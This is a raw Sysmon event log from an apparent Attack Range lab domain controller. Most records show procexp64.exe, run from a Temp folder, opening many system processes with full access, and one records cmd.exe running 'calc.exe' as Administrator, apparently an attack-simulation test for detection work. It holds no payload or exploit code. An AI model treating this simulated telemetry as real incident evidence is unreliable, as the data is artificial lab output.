15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-3269-6010-E1A2-00000000A301}56005224C:\Windows\System32\cmd.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000791866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.760{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXEcalc.exeC:\Windows\System32\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EA,IMPHASH=3843C3D4A5A7D1045ABE9A4BFCFAAB28{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c calc.exe 10341000x8000000000000000791865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 